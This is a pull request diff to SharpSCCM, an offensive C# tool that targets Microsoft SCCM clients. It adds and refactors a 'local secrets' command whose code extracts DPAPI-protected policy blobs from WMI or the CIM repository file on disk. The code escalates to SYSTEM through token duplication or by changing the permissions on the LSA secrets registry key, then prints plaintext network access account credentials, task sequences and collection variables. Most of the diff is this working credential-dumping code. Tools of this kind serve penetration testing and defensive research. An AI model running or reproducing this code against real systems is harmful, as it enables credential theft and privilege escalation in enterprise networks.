### PR TITLE
Local secrets

### DIFF
--- a/Program.cs
+++ b/Program.cs
@@ -496,7 +496,7 @@ namespace SharpSCCM
                     });
 
                 // local secrets
-                var getLocalSecrets = new Command("secrets", "Get policy secrets (e.g., network access accounts, task sequences, and collection variables) stored locally in the WMI repository (requires admin privileges)");
+                var getLocalSecrets = new Command("secrets","Get policy secrets (e.g., network access accounts, task sequences, and collection variables) stored locally in the WMI repository (requires admin privileges)");
                 localCommand.Add(getLocalSecrets);
                 getLocalSecrets.Add(new Argument<string>("method", "The method of obtaining the DPAPI-protected blobs: wmi or disk (note that the disk method can retrieve secrets that were changed or deleted"));
                 getLocalSecrets.Add(new Option<bool>(new[] { "--get-system", "-s" }, "Escalate to SYSTEM via token duplication (default is to modify and revert the permissions on the LSA secrets registry key)"));

--- a/Program.cs
+++ b/Program.cs
@@ -389,7 +389,7 @@ namespace SharpSCCM
                 localClassInstances.Handler = CommandHandler.Create(
                     (bool count, string wmiNamespace, string wmiClass, string[] properties, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost", wmiNamespace);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", wmiNamespace);
                         if (properties.Length == 0)
                         {
                             verbose = true;
@@ -405,7 +405,7 @@ namespace SharpSCCM
                 localClassProperties.Handler = CommandHandler.Create(
                     (string wmiNamespace, string wmiClass) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost", wmiNamespace);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", wmiNamespace);
                         ManagementObject classInstance = new ManagementClass(wmiConnection, new ManagementPath(wmiClass), new ObjectGetOptions()).CreateInstance();
                         MgmtUtil.PrintClassProperties(classInstance);
                     });
@@ -417,7 +417,7 @@ namespace SharpSCCM
                 localClasses.Handler = CommandHandler.Create(
                     (string wmiNamespace, bool count, string whereCondition, string orderBy, bool dryRun, bool verbose) =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost", wmiNamespace);
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", wmiNamespace);
                         MgmtUtil.PrintClasses(wmiConnection);
                     });
 
@@ -427,7 +427,7 @@ namespace SharpSCCM
                 getLocalClientInfo.Handler = CommandHandler.Create(
                     new Action(() =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1");
                         MgmtUtil.GetClassInstances(wmiConnection, "CCM_InstalledComponent", false, new[] { "Version" }, "Name='SmsClient'");
                     }));
 
@@ -452,42 +452,6 @@ namespace SharpSCCM
                         ClientFileSystem.GrepFile(path, stringToFind)
                     );
 
-                // local naa
-                var getLocalNetworkAccessAccounts = new Command("naa", "Get any network access accounts for the site using WMI (requires admin privileges)");
-                localCommand.Add(getLocalNetworkAccessAccounts);
-                getLocalNetworkAccessAccounts.Add(new Argument<string>("method", "The method of obtaining the DPAPI blob: WMI or Disk"));
-                getLocalNetworkAccessAccounts.Add(new Option<bool>(new[] { "--modify-registry-permissions", "-reg" }, "Modify the permissions on the LSA secrets registry key as current admin user. Default is escalation to system via token duplication."));
-                getLocalNetworkAccessAccounts.Handler = CommandHandler.Create(
-                    (string method, bool reg) =>
-                    {
-                        if (method == "wmi")
-                        {
-                            if (reg)
-                            {
-                                Credentials.LocalNetworkAccessAccountsWmi(reg);
-                            }
-                            else
-                            {
-                                Credentials.LocalNetworkAccessAccountsWmi();
-                            }
-                        }
-                        else if (method == "disk")
-                        {
-                            if (reg)
-                            {
-                                Credentials.LocalNetworkAccessAccountsDisk(reg);
-                            }
-                            else
-                            {
-                                Credentials.LocalNetworkAccessAccountsDisk();
-                            }
-                        }
-                        else
-                        {
-                            Console.WriteLine("[!] A method (wmi or disk) is required!");
-                        }
-                    });
-
                 // local push-logs
                 var localPushLogs = new Command("push-logs", "Search for evidence of client push installation");
                 localCommand.Add(localPushLogs);
@@ -498,13 +462,37 @@ namespace SharpSCCM
                         //LocalPushLogs();
                     }));
 
+                // local secrets
+                var getLocalSecrets = new Command("secrets", "Get policy secrets (e.g., network access accounts, task sequences, and collection variables) stored locally in the WMI repository (requires admin privileges)");
+                localCommand.Add(getLocalSecrets);
+                getLocalSecrets.Add(new Argument<string>("method", "The method of obtaining the DPAPI blob: wmi or disk"));
+                getLocalSecrets.Add(new Option<bool>(new[] { "--get-system", "-s" }, "Escalate to SYSTEM via token duplication (default is to modify and revert the permissions on the LSA secrets registry key)"));
+                getLocalSecrets.Handler = CommandHandler.Create(
+                    (string method, bool getSystem) =>
+                    {
+                        // default to registry permission modification
+                        bool reg = true ? !getSystem : false;
+                        if (method == "wmi")
+                        {
+                            Credentials.LocalSecretsWmi(reg);
+                        }
+                        else if (method == "disk")
+                        {
+                            Credentials.LocalSecretsDisk(reg);
+                        }
+                        else
+                        {
+                            Console.WriteLine("[!] A method (wmi or disk) is required!");
+                        }
+                    });
+
                 // local siteinfo
                 var localSiteInfo = new Command("siteinfo", "Get the primary Management Point and Site Code for the local host");
                 localCommand.Add(localSiteInfo);
                 localSiteInfo.Handler = CommandHandler.Create(
                     new Action(() =>
                     {
-                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+                        ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1");
                         MgmtUtil.GetClassInstances(wmiConnection, "SMS_Authority", false, new[] { "CurrentManagementPoint", "Name" });
                     }));
 

--- a/Program.cs
+++ b/Program.cs
@@ -482,7 +482,7 @@ namespace SharpSCCM
                             }
                             else if (method == "disk")
                             {
-                                Credentials.LocalSecretsDisk("all", reg);
+                                Credentials.LocalSecretsDisk(reg);
                             }
                             else
                             {
@@ -514,7 +514,7 @@ namespace SharpSCCM
                             }
                             else if (method == "disk")
                             {
-                                Credentials.LocalSecretsDisk("all", reg);
+                                Credentials.LocalSecretsDisk(reg);
                             }
                             else
                             {

--- a/SharpSCCM.csproj
+++ b/SharpSCCM.csproj
@@ -156,6 +156,7 @@
     <Error Condition="!Exists('packages\ILMerge.3.0.41\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', 'packages\ILMerge.3.0.41\build\ILMerge.props'))" />
   </Target>
   <PropertyGroup>
-    <PostBuildEvent>$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe $(TargetPath) $(TargetDir)System.CommandLine.dll $(TargetDir)System.CommandLine.NamingConventionBinder.dll $(TargetDir)System.Runtime.CompilerServices.Unsafe.dll $(TargetDir)System.Memory.dll $(TargetDir)Microsoft.ConfigurationManagement.Messaging.dll $(TargetDir)Microsoft.ConfigurationManagement.Security.Cryptography.dll /out:$(TargetDir)SharpSCCM_merged.exe</PostBuildEvent>
+    <PostBuildEvent>$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe $(TargetPath) $(TargetDir)System.CommandLine.dll $(TargetDir)System.CommandLine.NamingConventionBinder.dll $(TargetDir)System.Runtime.CompilerServices.Unsafe.dll $(TargetDir)System.Memory.dll $(TargetDir)Microsoft.ConfigurationManagement.Messaging.dll $(TargetDir)Microsoft.ConfigurationManagement.Security.Cryptography.dll /out:$(TargetDir)SharpSCCM_merged.exe
+copy $(TargetDir) \\192.168.86.118\cthompson\git\SharpSCCM\bin\x64\Debug\</PostBuildEvent>
   </PropertyGroup>
 </Project>

--- a/SharpSCCM.csproj
+++ b/SharpSCCM.csproj
@@ -156,7 +156,6 @@
     <Error Condition="!Exists('packages\ILMerge.3.0.41\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', 'packages\ILMerge.3.0.41\build\ILMerge.props'))" />
   </Target>
   <PropertyGroup>
-    <PostBuildEvent>$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe $(TargetPath) $(TargetDir)System.CommandLine.dll $(TargetDir)System.CommandLine.NamingConventionBinder.dll $(TargetDir)System.Runtime.CompilerServices.Unsafe.dll $(TargetDir)System.Memory.dll $(TargetDir)Microsoft.ConfigurationManagement.Messaging.dll $(TargetDir)Microsoft.ConfigurationManagement.Security.Cryptography.dll /out:$(TargetDir)SharpSCCM_merged.exe
-copy $(TargetDir) \\192.168.86.118\cthompson\git\SharpSCCM\bin\x64\Debug\</PostBuildEvent>
+    <PostBuildEvent>$(ProjectDir)packages\ILMerge.3.0.41\tools\net452\ILMerge.exe $(TargetPath) $(TargetDir)System.CommandLine.dll $(TargetDir)System.CommandLine.NamingConventionBinder.dll $(TargetDir)System.Runtime.CompilerServices.Unsafe.dll $(TargetDir)System.Memory.dll $(TargetDir)Microsoft.ConfigurationManagement.Messaging.dll $(TargetDir)Microsoft.ConfigurationManagement.Security.Cryptography.dll /out:$(TargetDir)SharpSCCM_merged.exe</PostBuildEvent>
   </PropertyGroup>
 </Project>

--- a/lib/ClientFileSystem.cs
+++ b/lib/ClientFileSystem.cs
@@ -181,7 +181,7 @@ namespace SharpSCCM
 
         public static void PushLogs(string startTime, string startDate)
         {
-            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost", "root\\cimv2");
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\cimv2");
             DateTime startDateObj = DateTime.Parse(startDate);
             // To-do
         }

--- a/lib/ClientWmi.cs
+++ b/lib/ClientWmi.cs
@@ -11,7 +11,7 @@ namespace SharpSCCM
             string currentManagementPoint = "";
             string siteCode = "";
 
-            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1");
             string query = MgmtUtil.BuildClassInstanceQueryString(wmiConnection, "SMS_Authority", false, new[] { "CurrentManagementPoint", "Name" });
             ManagementObjectCollection classInstances = MgmtUtil.GetClassInstanceCollection(wmiConnection, "SMS_Authority", query);
             foreach (ManagementObject queryObj in classInstances)
@@ -35,7 +35,7 @@ namespace SharpSCCM
 
         public static SmsClientId GetSmsId()
         {
-            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("localhost");
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1");
             ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_Client"));
             string smsId = null;
             foreach (ManagementObject instance in searcher.Get())

--- a/lib/Credentials.cs
+++ b/lib/Credentials.cs
@@ -1,7 +1,11 @@
-﻿using System;
+﻿using Microsoft.ConfigurationManagement.Messaging.Messages;
+using System;
+using System.Collections;
 using System.Collections.Generic;
 using System.IO;
+using System.Linq;
 using System.Management;
+using System.Reflection;
 using System.Text;
 using System.Text.RegularExpressions;
 
@@ -9,10 +13,10 @@ namespace SharpSCCM
 {
     public class Credentials
     {
-        public static void LocalSecretsDisk(bool reg)
+        public static void LocalSecretsDisk(string secretType = "all", bool reg = true)
         {
             // Thanks to @guervild on GitHub for contributing this code to SharpDPAPI
-            Console.WriteLine($"[+] Retrieving policy secret blobs from CIM repository\r\n");
+            Console.WriteLine($"[+] Retrieving {secretType} secret blobs from CIM repository\n");
 
             string fileData = "";
             MemoryStream ms = new MemoryStream();
@@ -35,43 +39,134 @@ namespace SharpSCCM
                 {
                     fileData = sr.ReadToEnd();
                 }
+                Regex allSecretsRegex = new Regex(pattern: @"<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
+                Regex networkAccessAccountRegex = new Regex(@"CCM_NetworkAccessAccount.*<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>.*<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
+                Regex taskSequenceRegex = new Regex(@"</SWDReserved>.*<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
+                Regex collectionVariableRegex = new Regex(@"CCM_CollectionVariable.*<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
 
-                //Regex regexData = new Regex(@"<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>.*<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
-                Regex regexData = new Regex(@"<PolicySecret Version=""1""><!\[CDATA\[(.*?)\]\]><\/PolicySecret>", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
-                var matchesData = regexData.Matches(fileData);
+                MatchCollection allSecretsMatches = allSecretsRegex.Matches(fileData);
+                MatchCollection networkAccessAccountMatches = networkAccessAccountRegex.Matches(fileData);
+                MatchCollection taskSequenceMatches = taskSequenceRegex.Matches(fileData);
+                MatchCollection collectionVariableMatches = collectionVariableRegex.Matches(fileData);
 
-                if (matchesData.Count <= 0)
-                {
-                    Console.WriteLine("\r\n[!] No policy secrets found.");
-                }
+                // Convert the MatchCollection objects to List<Match> so they can be compared
+                List<Match> allSecretsMatchesList = allSecretsMatches.Cast<Match>().ToList();
+                List<Match> networkAccessAccountMatchesList = networkAccessAccountMatches.Cast<Match>().ToList();
+                List<Match> taskSequenceMatchesList = taskSequenceMatches.Cast<Match>().ToList();
+                List<Match> collectionVariableMatchesList = collectionVariableMatches.Cast<Match>().ToList();
 
-                if (Helpers.IsHighIntegrity())
+                // Don't touch DPAPI unless there are secrets to decrypt
+                if (allSecretsMatches.Count > 0)
                 {
                     Dictionary<string, string> masterkeys;
                     masterkeys = Dpapi.TriageSystemMasterKeys(reg);
- 
-                    Console.WriteLine("\r\n[+] SYSTEM master key cache:");
-                    foreach (KeyValuePair<string, string> kvp in masterkeys)
+                    
+                    // Decrypt network access accounts
+                    if (networkAccessAccountMatchesList.Count > 0)
                     {
-                        Console.WriteLine("    {0}:{1}", kvp.Key, kvp.Value);
+                        Console.WriteLine("\n[+] Decrypting network access account secrets\n");
+                        for (int index = 0; index < networkAccessAccountMatchesList.Count; index++)
+                        {
+                            for (int idxGroup = 1; idxGroup < networkAccessAccountMatchesList[index].Groups.Count; idxGroup++)
+                            {
+                                try
+                                {
+                                    string secretPlaintext = Dpapi.Execute(networkAccessAccountMatchesList[index].Groups[idxGroup].Value, masterkeys);
+                                    Console.WriteLine("    Plaintext NAA: {0}", secretPlaintext);
+                                    Console.WriteLine();
+
+                                    // Remove network access accounts from remaining secrets to display, courtesy of ChatGPT
+                                    allSecretsMatchesList.RemoveAll(item1 => networkAccessAccountMatchesList.Any(item2 => item1.Groups.Cast<Group>().Any(group1 => item2.Groups.Cast<Group>().Any(group2 => group2.Value == group1.Value))));
+                                }
+                                catch (Exception e)
+                                {
+                                    Console.WriteLine("[!] Data was not decrypted");
+                                    Console.WriteLine(e.ToString());
+                                }
+                            }
+                        }
+                    }
+                    else
+                    {
+                        Console.WriteLine("\n[+] No network access account secrets found\n");
                     }
 
-                    Console.WriteLine("\r\n[+] Triaging SCCM policy secrets from CIM repository\r\n");
-                    for (int index = 0; index < matchesData.Count; index++)
+                    // Decrypt task sequences
+                    if (taskSequenceMatchesList.Count > 0)
                     {
+                        Console.WriteLine("\n[+] Decrypting task sequence secrets\n");
+                        for (int index = 0; index < taskSequenceMatchesList.Count; index++)
+                        {
+                            for (int idxGroup = 1; idxGroup < taskSequenceMatchesList[index].Groups.Count; idxGroup++)
+                            {
+                                try
+                                {
+                                    string secretPlaintext = Dpapi.Execute(taskSequenceMatchesList[index].Groups[idxGroup].Value, masterkeys);
+                                    Console.WriteLine($"    Plaintext: {secretPlaintext}");
 
-                        for (int idxGroup = 1; idxGroup < matchesData[index].Groups.Count; idxGroup++)
+                                    // Remove collection variables from remaining secrets to display, courtesy of ChatGPT
+                                    allSecretsMatchesList.RemoveAll(item1 => taskSequenceMatchesList.Any(item2 => item1.Groups.Cast<Group>().Any(group1 => item2.Groups.Cast<Group>().Any(group2 => group2.Value == group1.Value))));
+                                }
+                                catch (Exception e)
+                                {
+                                    Console.WriteLine("[!] Data was not decrypted");
+                                    Console.WriteLine(e.ToString());
+                                }
+                            }
+                        }
+                    }
+                    else
+                    {
+                        Console.WriteLine("\n[+] No task sequence secrets found\n");
+                    }
+
+                    // Decrypt collection variables
+                    if (collectionVariableMatchesList.Count > 0)
+                    {
+                        Console.WriteLine("\n[+] Decrypting collection variable secrets\n");
+                        for (int index = 0; index < collectionVariableMatchesList.Count; index++)
+                        {
+                            for (int idxGroup = 1; idxGroup < collectionVariableMatchesList[index].Groups.Count; idxGroup++)
+                            {
+                                try
+                                {
+                                    string secretPlaintext = Dpapi.Execute(collectionVariableMatchesList[index].Groups[idxGroup].Value, masterkeys);
+                                    Regex collectionVariableNameRegex = new Regex(@"CCM_CollectionVariable\x00\x00(.*?)\x00\x00.*<PolicySecret Version=""1"">", RegexOptions.Multiline | RegexOptions.IgnoreCase | RegexOptions.Compiled);
+                                    MatchCollection collectionVariableNameMatches = collectionVariableNameRegex.Matches(collectionVariableMatchesList[index].Value);
+                                    Console.WriteLine($"    Name:      {collectionVariableNameMatches[0].Groups[1].Value.Replace("\0", string.Empty)}");
+                                    Console.WriteLine($"    Plaintext: {secretPlaintext}");
+                                    Console.WriteLine();
+
+                                    // Remove collection variables from remaining secrets to display, courtesy of ChatGPT
+                                    allSecretsMatchesList.RemoveAll(item1 => collectionVariableMatchesList.Any(item2 => item1.Groups.Cast<Group>().Any(group1 => item2.Groups.Cast<Group>().Any(group2 => group2.Value == group1.Value))));
+                                }
+                                catch (Exception e)
+                                {
+                                    Console.WriteLine("[!] Data was not decrypted");
+                                    Console.WriteLine(e.ToString());
+                                }
+                            }
+                        }
+                    }
+                    else
+                    {
+                        Console.WriteLine("\n[+] No collection variable secrets found\n");
+                    }
+
+                    Console.WriteLine("\n[+] Decrypting other policy secrets\n");
+                    for (int index = 0; index < allSecretsMatchesList.Count; index++)
+                    {
+                        for (int idxGroup = 1; idxGroup < allSecretsMatchesList[index].Groups.Count; idxGroup++)
                         {
                             try
                             {
-                                string secretPlaintext = "";
-                                secretPlaintext = Dpapi.Execute(matchesData[index].Groups[idxGroup].Value, masterkeys);
-                                Console.WriteLine("     Plaintext secret: {0}", secretPlaintext);
-                                Console.WriteLine();
+                                string secretPlaintext = Dpapi.Execute(allSecretsMatchesList[index].Groups[idxGroup].Value, masterkeys);
+                                    Console.WriteLine("    Plaintext secret: {0}", secretPlaintext);
+                                    Console.WriteLine();
                             }
                             catch (Exception e)
                             {
-                                Console.WriteLine("[!] Data was not decrypted. An error occurred.");
+                                Console.WriteLine("[!] Data was not decrypted");
                                 Console.WriteLine(e.ToString());
                             }
                         }
@@ -79,294 +174,159 @@ namespace SharpSCCM
                 }
                 else
                 {
-                    Console.WriteLine("\r\n[!] You must be elevated to retrieve masterkeys.\r\n");
+                    Console.WriteLine("\n[!] No policy secrets found");
                 }
             }
             else
             {
-                Console.WriteLine("\r\n[!] OBJECTS.DATA does not exist or is not readable.\r\n");
+                Console.WriteLine("\n[!] OBJECTS.DATA does not exist or is not readable\n");
             }
         }
 
-        public static void LocalCollectionVariablesWmi(bool reg)
+        public static void DecryptLocalCollectionVariablesWmi(ManagementObjectCollection collectionVariables, Dictionary<string, string> masterkeys)
         {
-            if (Helpers.IsHighIntegrity())
+            Console.WriteLine("\n[+] Decrypting collection variables\n");
+            foreach (ManagementObject collectionVariable in collectionVariables)
             {
-                Console.WriteLine($"[*] Retrieving collection variable blobs via WMI");
-                ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
-                Console.WriteLine();
-                ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_CollectionVariable"));
-                ManagementObjectCollection collectionVariables = searcher.Get();
-                if (collectionVariables.Count > 0)
+                string collectionVariableName = collectionVariable["Name"].ToString();
+                string protectedCollectionVariableValue = collectionVariable["Value"].ToString().Split('[')[2].Split(']')[0];
+                try
                 {
-                    foreach (ManagementObject collectionVariable in collectionVariables)
-                    {
-                        string collectionVariableName = collectionVariable["Name"].ToString();
-                        string protectedCollectionVariableValue = collectionVariable["Value"].ToString().Split('[')[2].Split(']')[0];
-                        Dictionary<string, string> masterkeys;
-                        masterkeys = Dpapi.TriageSystemMasterKeys(reg);
-
-                        Console.WriteLine("\r\n[*] SYSTEM master key cache:");
-                        foreach (KeyValuePair<string, string> kvp in masterkeys)
-                        {
-                            Console.WriteLine("    {0}:{1}", kvp.Key, kvp.Value);
-                        }
-                        Console.WriteLine("\r\n[*] Triaging collection variables\r\n");
-                        try
-                        {
-                            string plaintextCollectionVariableValue = Dpapi.Execute(protectedCollectionVariableValue, masterkeys);
-                            Console.WriteLine("     Collection variable name: {0}", collectionVariableName);
-                            Console.WriteLine("              Plaintext value: {0}\n", plaintextCollectionVariableValue);
-                        }
-                        catch (Exception e)
-                        {
-                            Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                            Console.WriteLine(e.ToString());
-                        }
-                    }
+                    string plaintextCollectionVariableValue = Dpapi.Execute(protectedCollectionVariableValue, masterkeys);
+                    Console.WriteLine("    Collection variable name: {0}", collectionVariableName);
+                    Console.WriteLine("             Plaintext value: {0}", plaintextCollectionVariableValue);
                 }
-                else
+                catch (Exception e)
                 {
-                    Console.WriteLine($"[+] Found 0 instances of CCM_CollectionVariable.\n");
+                    Console.WriteLine("[!] Data was not decrypted. An error occurred.");
+                    Console.WriteLine(e.ToString());
                 }
             }
-            else
+        }
+
+        public static void DecryptLocalNetworkAccessAccountsWmi(ManagementObjectCollection networkAccessAccounts, Dictionary<string, string> masterkeys)
+        {
+            Console.WriteLine("\n[+] Decrypting network access account credentials\n");
+            foreach (ManagementObject account in networkAccessAccounts)
             {
-                Console.WriteLine("[!] SharpSCCM must be run elevated to retrieve the NAA blobs via WMI.\n");
+                string protectedUsername = account["NetworkAccessUsername"].ToString().Split('[')[2].Split(']')[0];
+                string protectedPassword = account["NetworkAccessPassword"].ToString().Split('[')[2].Split(']')[0];
+                byte[] protectedUsernameBytes = Helpers.StringToByteArray(protectedUsername);
+                int length = (protectedUsernameBytes.Length + 16 - 1) / 16 * 16;
+                Array.Resize(ref protectedUsernameBytes, length);
+
+                try
+                {
+                    string username = Dpapi.Execute(protectedUsername, masterkeys);
+                    string password = Dpapi.Execute(protectedPassword, masterkeys);
+
+                    if (username.StartsWith("00 00 0E 0E 0E") || password.StartsWith("00 00 0E 0E 0E"))
+                    {
+                        Console.WriteLine("\n[!] SCCM is configured to use the client's machine account instead of NAA\n");
+                    }
+                    else
+                    {
+                        Console.WriteLine("    Plaintext NAA Username: {0}", username);
+                        Console.WriteLine("    Plaintext NAA Password: {0}", password);
+                    }
+                }
+                catch (Exception e)
+                {
+                    Console.WriteLine("[!] Data was not decrypted. An error occurred.");
+                    Console.WriteLine(e.ToString());
+                }
+            }
+        }
+
+        public static void DecryptLocalTaskSequencesWmi(ManagementObjectCollection taskSequences, Dictionary<string, string> masterkeys)
+        {
+            Console.WriteLine("\n[+] Decrypting task sequences\n");
+            foreach (ManagementObject taskSequence in taskSequences)
+            {
+                string protectedTaskSequenceValue = taskSequence["TS_Sequence"].ToString().Split('[')[2].Split(']')[0];
+                try
+                {
+                    string plaintextTaskSequenceValue = Dpapi.Execute(protectedTaskSequenceValue, masterkeys);
+                    Console.WriteLine("    Plaintext task sequence: {0}", plaintextTaskSequenceValue);
+                }
+                catch (Exception e)
+                {
+                    Console.WriteLine("[!] Data was not decrypted. An error occurred.");
+                    Console.WriteLine(e.ToString());
+                }
             }
         }
 
         public static void LocalNetworkAccessAccountsWmi(bool reg)
         {
-            if (Helpers.IsHighIntegrity())
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
+            Console.WriteLine();
+            Console.WriteLine("[+] Retrieving network access account blobs via WMI");
+            ManagementObjectCollection networkAccessAccounts = MgmtUtil.GetClassWmiObjects(wmiConnection, "CCM_NetworkAccessAccount");
+            Console.WriteLine();
+            if (networkAccessAccounts.Count > 0)
             {
-                Console.WriteLine($"[*] Retrieving Network Access Account blobs via WMI\n");
-                ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
-                Console.WriteLine();
-                ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_NetworkAccessAccount"));
-                ManagementObjectCollection accounts = searcher.Get();
-                if (accounts.Count > 0)
-                {
-                    foreach (ManagementObject account in accounts)
-                    {
-                        string protectedUsername = account["NetworkAccessUsername"].ToString().Split('[')[2].Split(']')[0];
-                        string protectedPassword = account["NetworkAccessPassword"].ToString().Split('[')[2].Split(']')[0];
-
-                        byte[] protectedUsernameBytes = Helpers.StringToByteArray(protectedUsername);
-                        int length = (protectedUsernameBytes.Length + 16 - 1) / 16 * 16;
-                        Array.Resize(ref protectedUsernameBytes, length);
-                        Dictionary<string, string> masterkeys;
-                        masterkeys = Dpapi.TriageSystemMasterKeys(reg);
-                        Console.WriteLine("\r\n[*] SYSTEM master key cache:\r\n");
-
-                        foreach (KeyValuePair<string, string> kvp in masterkeys)
-                        {
-                            Console.WriteLine("{0}:{1}", kvp.Key, kvp.Value);
-                        }
-                        Console.WriteLine();
-
-                        try
-                        {
-                            string username = Dpapi.Execute(protectedUsername, masterkeys);
-                            string password = Dpapi.Execute(protectedPassword, masterkeys);
-
-                            if (username.StartsWith("00 00 0E 0E 0E") || password.StartsWith("00 00 0E 0E 0E"))
-                            {
-                                Console.WriteLine("\r\n[!] SCCM is configured to use the client's machine account instead of NAA\r\n");
-                            }
-                            else
-                            {
-                                Console.WriteLine("\r\n[*] Triaging Network Access Account Credentials\r\n");
-                                Console.WriteLine("     Plaintext NAA Username         : {0}", username);
-                                Console.WriteLine("     Plaintext NAA Password         : {0}\n", password);
-                            }
-                        }
-                        catch (Exception e)
-                        {
-                            Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                            Console.WriteLine(e.ToString());
-                        }
-                    }
-                }
-                else
-                {
-                    Console.WriteLine($"[+] Found 0 instances of CCM_NetworkAccessAccount.\n");
-                    Console.WriteLine($"[+] \n");
-                    Console.WriteLine($"[+] This could mean one of three things:\n");
-                    Console.WriteLine($"[+]    1. The SCCM environment does not have a Network Access Account configured\n");
-                    Console.WriteLine($"[+]    2. This host is not an SCCM client (and never has been)\n");
-                    Console.WriteLine($"[+]    3. This host is no longer an SCCM client (but used to be)\n");
-                    Console.WriteLine($"[+] You can attempt running 'SharpSCCM local naa disk' to retrieve NAA credentials from machines\n");
-                    Console.WriteLine($"[+] that used to be SCCM clients but have since had the client uninstalled.");
-                }
+                Dictionary<string, string> masterkeys = Dpapi.TriageSystemMasterKeys(reg);
+                DecryptLocalNetworkAccessAccountsWmi(networkAccessAccounts, masterkeys);
             }
             else
             {
-                Console.WriteLine("[!] SharpSCCM must be run elevated to retrieve the NAA blobs via WMI.\n");
+                Console.WriteLine("[+] No network access accounts were found");
             }
-        }
-
-        public static void LocalTaskSequencesWmi(bool reg)
-        {
-            if (Helpers.IsHighIntegrity())
-            {
-                Console.WriteLine($"[*] Retrieving task sequence blobs via WMI");
-                ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
-                Console.WriteLine();
-                ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_TaskSequence"));
-                ManagementObjectCollection taskSequences = searcher.Get();
-                if (taskSequences.Count > 0)
-                {
-                    foreach (ManagementObject taskSequence in taskSequences)
-                    {
-                        string protectedTaskSequenceValue = taskSequence["TS_Sequence"].ToString().Split('[')[2].Split(']')[0];
-                        Dictionary<string, string> masterkeys;
-                        masterkeys = Dpapi.TriageSystemMasterKeys(reg);
-
-                        Console.WriteLine("\r\n[*] SYSTEM master key cache:");
-                        foreach (KeyValuePair<string, string> kvp in masterkeys)
-                        {
-                            Console.WriteLine("    {0}:{1}", kvp.Key, kvp.Value);
-                        }
-                        Console.WriteLine("\r\n[*] Triaging task sequences\r\n");
-                        try
-                        {
-                            string plaintextTaskSequenceValue = Dpapi.Execute(protectedTaskSequenceValue, masterkeys);
-                            Console.WriteLine("        Plaintext task sequence: {0}\n", plaintextTaskSequenceValue);
-                        }
-                        catch (Exception e)
-                        {
-                            Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                            Console.WriteLine(e.ToString());
-                        }
-                    }
-                }
-                else
-                {
-                    Console.WriteLine($"[+] Found 0 instances of CCM_CollectionVariable.\n");
-                }
-            }
-            else
-            {
-                Console.WriteLine("[!] SharpSCCM must be run elevated to retrieve the NAA blobs via WMI.\n");
-            }
-        }
-
-        public static void LocalSecretsWmiA(bool reg)
-        {
-            LocalNetworkAccessAccountsWmi(reg);
-            LocalTaskSequencesWmi(reg);
-            LocalCollectionVariablesWmi(reg);
         }
 
         public static void LocalSecretsWmi(bool reg)
         {
-            if (Helpers.IsHighIntegrity())
+            ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
+            Console.WriteLine();
+            Console.WriteLine("[+] Retrieving network access account blobs via WMI");
